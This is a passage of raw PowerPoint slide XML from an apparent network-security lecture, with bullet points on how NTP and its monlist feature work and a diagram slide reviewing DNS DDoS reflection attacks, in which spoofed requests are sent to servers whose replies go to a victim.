          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Windows PCs are set by default to sync the clock from a Microsoft NTP server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UDP port 123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client sends a request (packet size about 48bytes) to an NTP server for the time, and then the client listens for a response from the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NTP also has a feature called “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>monlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” in which a client can request (packet size about 48bytes) a list that contains the last 600 hostnames with IP addresses of clients that have connected to that server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The NTP request also contains a 32-bit Reference ID that the server response must contain for the client to accept the response.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74882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bwMode="auto">
          <a:xfrm>
            <a:off x="635001" y="838200"/>
            <a:ext cx="11607799" cy="1066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30045" tIns="65022" rIns="130045" bIns="65022" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Review: DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Reflection attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3835400" y="3505201"/>
            <a:ext cx="1733550" cy="1647825"/>
            <a:chOff x="1161" y="1173"/>
            <a:chExt cx="768" cy="730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31785" name="Freeform 4"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="31786" name="Object 5"/>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spid="_x0000_s132220" name="Clip" r:id="rId4" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId4" imgW="1307079" imgH="1083682"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3" name="Group 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4848225" y="1917700"/>
            <a:ext cx="1735138" cy="1649414"/>
            <a:chOff x="1161" y="1173"/>
            <a:chExt cx="768" cy="730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31783" name="Freeform 7"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="31784" name="Object 8"/>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spid="_x0000_s132221" name="Clip" r:id="rId6" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId6" imgW="1307079" imgH="1083682"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4" name="Group 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3713163" y="5476876"/>
            <a:ext cx="1733550" cy="1647825"/>
            <a:chOff x="1161" y="1173"/>
            <a:chExt cx="768" cy="730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31781" name="Freeform 10"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="31782" name="Object 11"/>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spid="_x0000_s132222" name="Clip" r:id="rId7" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId7" imgW="1307079" imgH="1083682"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6" name="Group 12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5106988" y="7553326"/>
            <a:ext cx="1733550" cy="1647825"/>
            <a:chOff x="1161" y="1173"/>
            <a:chExt cx="768" cy="730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31779" name="Freeform 13"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="31780" name="Object 14"/>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spid="_x0000_s132223" name="Clip" r:id="rId8" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId8" imgW="1307079" imgH="1083682" progId="">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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31752" name="Freeform 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6492875" y="3471862"/>
            <a:ext cx="4244975" cy="430371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130045" tIns="65022" rIns="130045" bIns="65022" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="31753" name="Object 16"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="11296650" y="5661026"/>
          <a:ext cx="869951" cy="741363"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s132224" name="Clip" r:id="rId9" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId9" imgW="1307079" imgH="1083682" progId="">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96650" y="5661026"/>
                        <a:ext cx="869951" cy="741363"/>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1754" name="Object 17"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1509713" y="4556126"/>
          <a:ext cx="869951" cy="739775"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s132225" name="Clip" r:id="rId10" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId10" imgW="1307079" imgH="1083682" progId="">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9713" y="4556126"/>
                        <a:ext cx="869951" cy="739775"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="31755" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6240464" y="2898775"/>
            <a:ext cx="4991100" cy="2879726"/>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lIns="130045" tIns="65022" rIns="130045" bIns="65022"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31756" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5327650" y="4338639"/>
            <a:ext cx="5867401" cy="1650999"/>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lIns="130045" tIns="65022" rIns="130045" bIns="65022"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31757" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5273675" y="6130926"/>
            <a:ext cx="5957888" cy="34926"/>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lIns="130045" tIns="65022" rIns="130045" bIns="65022"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31758" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6610351" y="6376989"/>
            <a:ext cx="4638674" cy="1650999"/>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lIns="130045" tIns="65022" rIns="130045" bIns="65022"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31759" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2425701" y="2968626"/>
            <a:ext cx="2689225" cy="1649414"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130045" tIns="65022" rIns="130045" bIns="65022"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31760" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2568574" y="4497389"/>
            <a:ext cx="1562101" cy="473075"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130045" tIns="65022" rIns="130045" bIns="65022"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31761" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514602" y="5199063"/>
            <a:ext cx="1528762" cy="738187"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130045" tIns="65022" rIns="130045" bIns="65022"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31762" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286001" y="5356226"/>
            <a:ext cx="3200400" cy="2813050"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130045" tIns="65022" rIns="130045" bIns="65022"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31763" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1231901" y="5438775"/>
            <a:ext cx="1083371" cy="408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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31764" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11280776" y="6388100"/>
            <a:ext cx="1019536" cy="485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2300" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31765" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5359402" y="8507413"/>
            <a:ext cx="1457262" cy="408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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31766" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3987801" y="6450014"/>
            <a:ext cx="1457262" cy="408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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31767" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4064000" y="4495801"/>
            <a:ext cx="1457262" cy="408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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31768" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5054601" y="2895600"/>
            <a:ext cx="1457262" cy="408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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31769" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2179638" y="3729038"/>
            <a:ext cx="1030935" cy="408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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31770" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2894013" y="4176714"/>
            <a:ext cx="1030935" cy="408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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31771" name="Text Box 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3286124" y="5195888"/>
            <a:ext cx="1030935" cy="408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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31772" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3074988" y="6923089"/>
            <a:ext cx="1030935" cy="408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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31773" name="Text Box 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8220077" y="3711576"/>
            <a:ext cx="764196" cy="408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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31774" name="Text Box 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7566026" y="4481513"/>
            <a:ext cx="764196" cy="408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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31775" name="Text Box 38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7797800" y="6107113"/>
            <a:ext cx="764196" cy="408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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31776" name="Text Box 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8353426" y="7339014"/>
            <a:ext cx="764196" cy="408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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31777" name="TextBox 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1917041" y="8496300"/>
            <a:ext cx="2615520" cy="408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30046" tIns="65023" rIns="130046" bIns="65023">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r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Source IP = Victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
